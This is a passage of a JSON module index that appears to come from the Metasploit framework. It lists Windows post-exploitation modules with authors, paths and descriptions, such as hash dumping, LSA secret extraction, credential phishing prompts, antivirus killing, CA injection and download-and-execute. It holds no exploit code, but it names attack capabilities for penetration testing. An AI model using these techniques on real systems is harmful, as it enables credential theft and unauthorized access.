"Wesley McGrew <wesley@mcgrewsecurity.com>"
],
"description": "Maps remote disks and logical volumes to a local Network Block Device server.\n Allows for forensic tools to be executed on the remote disk directly.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/forensics/nbd_server.rb",
"is_install_path": true,
"ref_name": "windows/gather/forensics/nbd_server",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/forensics/recovery_files": {
"name": "Windows Gather Deleted Files Enumeration and Recovering",
"full_name": "post/windows/gather/forensics/recovery_files",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "This module lists and attempts to recover deleted files from NTFS file systems. Use the FILES option to guide recovery. Leave this option empty to enumerate deleted files in the DRIVE. Set FILES to an extension (e.g., \"pdf\") to recover deleted files with that extension, or set FILES to a comma separated list of IDs (from enumeration) to recover those files. The session user must have sufficient privileges on the DRIVE for raw file enumeration. Recovery may take a long time; use the TIMEOUT option to abort enumeration or recovery by extension after a specified period (in seconds).",
"references": [
"URL-http://www.youtube.com/watch?v=9yzCf360ujY&hd=1"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/forensics/recovery_files.rb",
"is_install_path": true,
"ref_name": "windows/gather/forensics/recovery_files",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/hashdump": {
"name": "Windows Gather Local User Account Password Hashes (Registry)",
"full_name": "post/windows/gather/hashdump",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module will dump the local user accounts from the SAM database using the registry",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/hashdump.rb",
"is_install_path": true,
"ref_name": "windows/gather/hashdump",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/local_admin_search_enum": {
"name": "Windows Gather Local Admin Search",
"full_name": "post/windows/gather/local_admin_search_enum",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Brandon McCann \"zeknox\" <bmccann@accuvant.com>",
"Thomas McCarthy \"smilingraccoon\" <smilingraccoon@gmail.com>",
"Royce Davis \"r3dy\" <rdavis@accuvant.com>"
],
"description": "This module will identify systems in a given range that the supplied domain user (the session should first be migrated into a process running as that user) has administrative access to, by using the Windows API OpenSCManagerA to establish a handle to the remote host. Additionally it can enumerate logged in users and group membership via the Windows APIs NetWkstaUserEnum and NetUserGetGroups.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/local_admin_search_enum.rb",
"is_install_path": true,
"ref_name": "windows/gather/local_admin_search_enum",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/lsa_secrets": {
"name": "Windows Enumerate LSA Secrets",
"full_name": "post/windows/gather/lsa_secrets",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Rob Bathurst <rob.bathurst@foundstone.com>"
],
"description": "This module will attempt to enumerate the LSA Secrets keys within the registry. The registry key used is: HKEY_LOCAL_MACHINE\\Security\\Policy\\Secrets\\. Thanks go to Maurizio Agazzini and Mubix for the decrypt code from cachedump.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/lsa_secrets.rb",
"is_install_path": true,
"ref_name": "windows/gather/lsa_secrets",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/make_csv_orgchart": {
"name": "Generate CSV Organizational Chart Data Using Manager Information",
"full_name": "post/windows/gather/make_csv_orgchart",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Stuart Morgan <stuart.morgan@mwrinfosecurity.com>"
],
"description": "This module will generate a CSV file containing all users and their managers, which can be\n imported into Visio which will render it.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/make_csv_orgchart.rb",
"is_install_path": true,
"ref_name": "windows/gather/make_csv_orgchart",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/memory_grep": {
"name": "Windows Gather Process Memory Grep",
"full_name": "post/windows/gather/memory_grep",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"bannedit <bannedit@metasploit.com>"
],
"description": "This module allows for searching the memory space of a process for potentially\n sensitive data. Please note: When the HEAP option is enabled, the module will have\n to migrate to the process you are grepping, and will not migrate back automatically.\n This means that if the user terminates the application after using this module, you\n may lose your session.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-17 16:00:04 +0000",
"path": "/modules/post/windows/gather/memory_grep.rb",
"is_install_path": true,
"ref_name": "windows/gather/memory_grep",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/netlm_downgrade": {
"name": "Windows NetLM Downgrade Attack",
"full_name": "post/windows/gather/netlm_downgrade",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Brandon McCann \"zeknox\" <bmccann@accuvant.com>",
"Thomas McCarthy \"smilingraccoon\" <smilingraccoon@gmail.com>"
],
"description": "This module will change a registry value to enable the sending of LM challenge hashes and then initiate an SMB connection to the host in the SMBHOST datastore option. If an SMB server is listening there, it will receive the NetLM hashes. Note that this weakens the target's authentication configuration; confirm the original registry value is restored once the hashes have been captured.",
"references": [
"URL-http://www.fishnetsecurity.com/6labs/blog/post-exploitation-using-netntlm-downgrade-attacks"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/netlm_downgrade.rb",
"is_install_path": true,
"ref_name": "windows/gather/netlm_downgrade",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/ntds_grabber": {
"name": "NTDS Grabber",
"full_name": "post/windows/gather/ntds_grabber",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Koen Riepe <koen.riepe@fox-it.com>"
],
"description": "This module uses a PowerShell script to obtain a copy of the ntds.dit, SAM and SYSTEM files on a domain controller. It compresses all these files into a cabinet file called All.cab.",
"references": [
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-06-26 08:22:11 +0000",
"path": "/modules/post/windows/gather/ntds_grabber.rb",
"is_install_path": true,
"ref_name": "windows/gather/ntds_grabber",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/ntds_location": {
"name": "Post Windows Gather NTDS.DIT Location",
"full_name": "post/windows/gather/ntds_location",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Stuart Morgan <stuart.morgan@mwrinfosecurity.com>"
],
"description": "This module will find the location of the NTDS.DIT file (from the Registry),\n check that it exists, and display its location on the screen, which is useful\n if you wish to manually acquire the file using ntdsutil or vss.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/ntds_location.rb",
"is_install_path": true,
"ref_name": "windows/gather/ntds_location",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/outlook": {
"name": "Windows Gather Outlook Email Messages",
"full_name": "post/windows/gather/outlook",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Wesley Neelen <security@forsec.nl>"
],
"description": "This module allows reading and searching email messages from the local Outlook installation using PowerShell. Please note that this module manipulates the victim's keyboard/mouse. If a user is active on the target system, they may notice the activities of this module. Tested on Windows 8.1 x64 with Office 2013.",
"references": [
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/outlook.rb",
"is_install_path": true,
"ref_name": "windows/gather/outlook",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/phish_windows_credentials": {
"name": "Windows Gather User Credentials (phishing)",
"full_name": "post/windows/gather/phish_windows_credentials",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Wesley Neelen <security@forsec.nl>",
"Matt Nelson"
],
"description": "This module is able to perform a phishing attack on the target by popping up a login prompt. When the user fills in credentials in the login prompt, the credentials will be sent to the attacker. The module is able to monitor for new processes and pop up a login prompt when a specific process is starting. Tested on Windows 7.",
"references": [
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/phish_windows_credentials.rb",
"is_install_path": true,
"ref_name": "windows/gather/phish_windows_credentials",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/psreadline_history": {
"name": "Windows Gather PSReadline History",
"full_name": "post/windows/gather/psreadline_history",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Garvit Dewan <d.garvit@gmail.com>"
],
"description": "Gathers PowerShell (PSReadline) command history data from the target machine.",
"references": [
"URL-https://docs.microsoft.com/en-us/powershell/module/psreadline/",
"URL-https://github.com/KalibRx/PoshHarvestPy/blob/master/poshharvest.py",
"URL-https://0xdf.gitlab.io/2018/11/08/powershell-history-file.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-02-13 12:38:36 +0000",
"path": "/modules/post/windows/gather/psreadline_history.rb",
"is_install_path": true,
"ref_name": "windows/gather/psreadline_history",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/resolve_sid": {
"name": "Windows Gather Local User Account SID Lookup",
"full_name": "post/windows/gather/resolve_sid",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"chao-mu"
],
"description": "This module prints information about a given SID from the perspective of this session",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/resolve_sid.rb",
"is_install_path": true,
"ref_name": "windows/gather/resolve_sid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/reverse_lookup": {
"name": "Windows Gather IP Range Reverse Lookup",
"full_name": "post/windows/gather/reverse_lookup",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"mubix <mubix@hak5.org>"
],
"description": "This module uses Railgun, calling the gethostbyaddr function, to perform a reverse lookup of each IP address in the given range and resolve it to a hostname.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/reverse_lookup.rb",
"is_install_path": true,
"ref_name": "windows/gather/reverse_lookup",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/screen_spy": {
"name": "Windows Gather Screen Spy",
"full_name": "post/windows/gather/screen_spy",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Roni Bachar <roni.bachar.blog@gmail.com>",
"bannedit <bannedit@metasploit.com>",
"kernelsmith <kernelsmith /x40 kernelsmith /x2E com>",
"Adrian Kubok"
],
"description": "This module will incrementally take desktop screenshots from the host. This\n allows for screen spying which can be useful to determine if there is an active\n user on a machine, or to record the screen for later data extraction.\n\n Note: As of March, 2014, the VIEW_CMD option has been removed in\n favor of the Boolean VIEW_SCREENSHOTS option, which will control if (but\n not how) the collected screenshots will be viewed from the Metasploit\n interface.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-06-12 17:11:29 +0000",
"path": "/modules/post/windows/gather/screen_spy.rb",
"is_install_path": true,
"ref_name": "windows/gather/screen_spy",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/smart_hashdump": {
"name": "Windows Gather Local and Domain Controller Account Password Hashes",
"full_name": "post/windows/gather/smart_hashdump",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "This will dump local accounts from the SAM Database. If the target\n host is a Domain Controller, it will dump the Domain Account Database using the proper\n technique depending on privilege level, OS and role of the host.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/smart_hashdump.rb",
"is_install_path": true,
"ref_name": "windows/gather/smart_hashdump",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/tcpnetstat": {
"name": "Windows Gather TCP Netstat",
"full_name": "post/windows/gather/tcpnetstat",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"mubix <mubix@hak5.org>"
],
"description": "This module lists current TCP sessions",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/tcpnetstat.rb",
"is_install_path": true,
"ref_name": "windows/gather/tcpnetstat",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/usb_history": {
"name": "Windows Gather USB Drive History",
"full_name": "post/windows/gather/usb_history",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"nebulus"
],
"description": "This module will enumerate USB Drive history on a target host.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/usb_history.rb",
"is_install_path": true,
"ref_name": "windows/gather/usb_history",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/win_privs": {
"name": "Windows Gather Privileges Enumeration",
"full_name": "post/windows/gather/win_privs",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Merlyn Cousins <drforbin6@gmail.com>"
],
"description": "This module will print if UAC is enabled, and if the current account is\n ADMIN enabled. It will also print UID, foreground SESSION ID, is SYSTEM status\n and current process PRIVILEGES.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-19 01:35:19 +0000",
"path": "/modules/post/windows/gather/win_privs.rb",
"is_install_path": true,
"ref_name": "windows/gather/win_privs",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/wmic_command": {
"name": "Windows Gather Run Specified WMIC Command",
"full_name": "post/windows/gather/wmic_command",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "This module will execute the given WMIC command options, or read WMIC command options from a resource file, and execute the commands in the specified Meterpreter session.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/wmic_command.rb",
"is_install_path": true,
"ref_name": "windows/gather/wmic_command",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/word_unc_injector": {
"name": "Windows Gather Microsoft Office Word UNC Path Injector",
"full_name": "post/windows/gather/word_unc_injector",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"SphaZ <cyberphaz@gmail.com>"
],
"description": "This module modifies a remote .docx file that will, upon opening, submit\n stored netNTLM credentials to a remote host. Verified to work with Microsoft\n Word 2003, 2007, 2010, and 2013. In order to get the hashes the\n auxiliary/server/capture/smb module can be used.",
"references": [
"URL-http://jedicorp.com/?p=534"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/word_unc_injector.rb",
"is_install_path": true,
"ref_name": "windows/gather/word_unc_injector",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/add_user_domain": {
"name": "Windows Manage Add User to the Domain and/or to a Domain Group",
"full_name": "post/windows/manage/add_user_domain",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Joshua Abraham <jabra@rapid7.com>"
],
"description": "This module adds a user to the Domain and/or to a Domain group. It will\n check if sufficient privileges are present for certain actions and run\n getprivs for system. If you elevated privs to system, the\n SeAssignPrimaryTokenPrivilege will not be assigned. You need to migrate to\n a process that is running as system. If you don't have privs, this script\n exits.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-17 16:00:04 +0000",
"path": "/modules/post/windows/manage/add_user_domain.rb",
"is_install_path": true,
"ref_name": "windows/manage/add_user_domain",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/archmigrate": {
"name": "Architecture Migrate",
"full_name": "post/windows/manage/archmigrate",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Koen Riepe <koen.riepe@fox-it.com>"
],
"description": "This module checks if the meterpreter architecture is the same as the OS architecture and if it's incompatible it spawns a\n new process with the correct architecture and migrates into that process.",
"references": [
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/archmigrate.rb",
"is_install_path": true,
"ref_name": "windows/manage/archmigrate",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/change_password": {
"name": "Windows Manage Change Password",
"full_name": "post/windows/manage/change_password",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "This module will attempt to change the password of the targeted account.\n The typical usage is to change a newly created account's password on a\n remote host to avoid the error, 'System error 1907 has occurred,' which\n is caused when the account policy enforces a password change before the\n next login.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/change_password.rb",
"is_install_path": true,
"ref_name": "windows/manage/change_password",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/clone_proxy_settings": {
"name": "Windows Manage Proxy Setting Cloner",
"full_name": "post/windows/manage/clone_proxy_settings",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"mubix <mubix@hak5.org>"
],
"description": "This module copies the proxy settings from the current user to the\n targeted user SID, supports remote hosts as well if remote registry\n is allowed.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/clone_proxy_settings.rb",
"is_install_path": true,
"ref_name": "windows/manage/clone_proxy_settings",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/delete_user": {
"name": "Windows Manage Local User Account Deletion",
"full_name": "post/windows/manage/delete_user",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"chao-mu"
],
"description": "This module deletes a local user account from the specified server,\n or the local machine if no server is given.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/delete_user.rb",
"is_install_path": true,
"ref_name": "windows/manage/delete_user",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/download_exec": {
"name": "Windows Manage Download and/or Execute",
"full_name": "post/windows/manage/download_exec",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"RageLtMan"
],
"description": "This module will download a file by importing urlmon via railgun.\n The user may also choose to execute the file with arguments via exec_string.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/download_exec.rb",
"is_install_path": true,
"ref_name": "windows/manage/download_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/driver_loader": {
"name": "Windows Manage Driver Loader",
"full_name": "post/windows/manage/driver_loader",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "This module loads a KMD (Kernel Mode Driver) using the Windows Service API.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/driver_loader.rb",
"is_install_path": true,
"ref_name": "windows/manage/driver_loader",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/enable_rdp": {
"name": "Windows Manage Enable Remote Desktop",
"full_name": "post/windows/manage/enable_rdp",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "This module enables the Remote Desktop Service (RDP). It provides the options to create\n an account and configure it to be a member of the Local Administrators and\n Remote Desktop Users group. It can also forward the target's port 3389/tcp.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-08-21 22:46:30 +0000",
"path": "/modules/post/windows/manage/enable_rdp.rb",
"is_install_path": true,
"ref_name": "windows/manage/enable_rdp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/enable_support_account": {
"name": "Windows Manage Trojanize Support Account",
"full_name": "post/windows/manage/enable_support_account",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"salcho <salchoman@gmail.com>"
],
"description": "This module enables alternative access to servers and workstations\n by modifying the support account's properties. It enables the\n account for remote access as the administrator user, taking\n advantage of some unusual behavior in lusrmgr.msc. It first\n checks that sufficient privileges are available for registry operations\n and exits if they are not.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/enable_support_account.rb",
"is_install_path": true,
"ref_name": "windows/manage/enable_support_account",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"post_windows/manage/exec_powershell": {
"name": "Windows Powershell Execution Post Module",
"full_name": "post/windows/manage/exec_powershell",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Nicholas Nam (nick) <nick@executionflow.org>",
"RageLtMan"
],
"description": "This module will execute a powershell script in a meterpreter session.\n The user may also enter text substitutions to be made in memory before execution.\n Setting VERBOSE to true will output both the script prior to execution and the results.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/exec_powershell.rb",
"is_install_path": true,
"ref_name": "windows/manage/exec_powershell",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/forward_pageant": {
"name": "Forward SSH Agent Requests To Remote Pageant",
"full_name": "post/windows/manage/forward_pageant",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Stuart Morgan <stuart.morgan@mwrinfosecurity.com>",
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "This module forwards SSH agent requests from a local socket to a remote Pageant instance.\n If a target Windows machine is compromised and is running Pageant, this will allow the\n attacker to run normal OpenSSH commands (e.g. ssh-add -l) against the Pageant host which are\n tunneled through the meterpreter session. This could therefore be used to authenticate\n with a remote host using a private key which is loaded into a remote user's Pageant instance,\n without ever having knowledge of the private key itself.\n\n Note that this requires the PageantJacker meterpreter extension, but this will be automatically\n loaded into the remote meterpreter session by this module if it is not already loaded.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-17 16:00:04 +0000",
"path": "/modules/post/windows/manage/forward_pageant.rb",
"is_install_path": true,
"ref_name": "windows/manage/forward_pageant",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/hashcarve": {
"name": "Windows Local User Account Hash Carver",
"full_name": "post/windows/manage/hashcarve",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"p3nt4"
],
"description": "This module will change a local user's password directly in the registry.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/hashcarve.rb",
"is_install_path": true,
"ref_name": "windows/manage/hashcarve",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/ie_proxypac": {
"name": "Windows Manage Proxy PAC File",
"full_name": "post/windows/manage/ie_proxypac",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "This module configures Internet Explorer to use a PAC proxy file. By using the LOCAL_PAC\n option, a PAC file will be created on the victim host. It's also possible to provide a\n remote PAC file (REMOTE_PAC option) by providing the full URL.",
"references": [
"URL-https://www.youtube.com/watch?v=YGjIlbBVDqE&hd=1",
"URL-http://blog.scriptmonkey.eu/bypassing-group-policy-using-the-windows-registry"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/ie_proxypac.rb",
"is_install_path": true,
"ref_name": "windows/manage/ie_proxypac",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/inject_ca": {
"name": "Windows Manage Certificate Authority Injection",
"full_name": "post/windows/manage/inject_ca",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"vt <nick.freeman@security-assessment.com>"
],
"description": "This module allows the attacker to insert an arbitrary CA certificate\n into the victim's Trusted Root store.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/inject_ca.rb",
"is_install_path": true,
"ref_name": "windows/manage/inject_ca",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/inject_host": {
"name": "Windows Manage Hosts File Injection",
"full_name": "post/windows/manage/inject_host",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"vt <nick.freeman@security-assessment.com>"
],
"description": "This module allows the attacker to insert a new entry into the target\n system's hosts file.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-06-12 17:11:29 +0000",
"path": "/modules/post/windows/manage/inject_host.rb",
"is_install_path": true,
"ref_name": "windows/manage/inject_host",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/killav": {
"name": "Windows Post Kill Antivirus and Hips",
"full_name": "post/windows/manage/killav",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Marc-Andre Meloche (MadmanTM)",
"Nikhil Mittal (Samratashok)",
"Jerome Athias",
"OJ Reeves"
],
"description": "This module attempts to locate and terminate any processes that are identified\n as being Antivirus or Host-based IPS related.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/killav.rb",
"is_install_path": true,
"ref_name": "windows/manage/killav",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/migrate": {
"name": "Windows Manage Process Migration",
"full_name": "post/windows/manage/migrate",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "This module will migrate a Meterpreter session from one process\n to another. It can migrate to a given process PID, or the module can spawn\n a new process and migrate to that newly spawned process.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/migrate.rb",
"is_install_path": true,
"ref_name": "windows/manage/migrate",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/mssql_local_auth_bypass": {
"name": "Windows Manage Local Microsoft SQL Server Authorization Bypass",
